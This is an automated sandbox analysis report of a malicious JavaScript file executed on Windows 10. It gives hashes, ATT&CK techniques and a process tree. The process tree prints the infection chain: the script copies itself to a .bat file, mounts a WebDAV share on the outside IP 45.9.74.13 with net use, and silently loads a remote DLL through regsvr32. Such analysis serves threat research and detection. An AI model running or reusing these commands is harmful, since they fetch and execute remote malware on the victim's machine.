febf16e318dbb32ba0b6a8320fe7e8d547736db2c8ae2241f05b08f3a6f8f049

Analysis

max time kernel
149s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
11/07/2024, 05:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

32482319263008431658.js
Size

5KB
MD5

29913b169fda46e6028e3b1e77cbfc7e
SHA1

604590c46e5c82928f64dac242940cdf887356f4
SHA256

febf16e318dbb32ba0b6a8320fe7e8d547736db2c8ae2241f05b08f3a6f8f049
SHA512

e065b9f548d732f63cc3230af719df56b61b18cef657e5b8a5744754bb0e24873b9680ff50ad9956b14d20182fd4b23404b7a1056a37c539d6bd7b72f604523d
SSDEEP

96:kcOFUlzgJBQ0/ZMfPsZMTbcWjURjd33juy413LjU0kuj:ktUlka0WHFbcCelzydn/k4

Score

7^/10

execution

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-384068567-2943195810-3631207890-1000\Control Panel\International\Geo\Nation	wscript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs net.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3188 wrote to memory of 4256	3188	wscript.exe	84
PID 3188 wrote to memory of 4256	3188	wscript.exe	84
PID 4256 wrote to memory of 1448	4256	cmd.exe	86
PID 4256 wrote to memory of 1448	4256	cmd.exe	86
PID 4256 wrote to memory of 2448	4256	cmd.exe	87
PID 4256 wrote to memory of 2448	4256	cmd.exe	87

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\32482319263008431658.js
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3188
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k copy "C:\Users\Admin\AppData\Local\Temp\32482319263008431658.js" "C:\Users\Admin\\mqvaju.bat" && "C:\Users\Admin\\mqvaju.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4256
- - C:\Windows\system32\net.exe
    net use \\45.9.74.13@8888\DavWWWRoot\
    3⤵
    PID:1448
- - C:\Windows\system32\regsvr32.exe
    regsvr32 /s \\45.9.74.13@8888\DavWWWRoot\966.dll
    3⤵
    PID:2448

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\mqvaju.bat

Filesize
5KB

MD5
29913b169fda46e6028e3b1e77cbfc7e

SHA1
604590c46e5c82928f64dac242940cdf887356f4

SHA256
febf16e318dbb32ba0b6a8320fe7e8d547736db2c8ae2241f05b08f3a6f8f049

SHA512
e065b9f548d732f63cc3230af719df56b61b18cef657e5b8a5744754bb0e24873b9680ff50ad9956b14d20182fd4b23404b7a1056a37c539d6bd7b72f604523d

Download Submit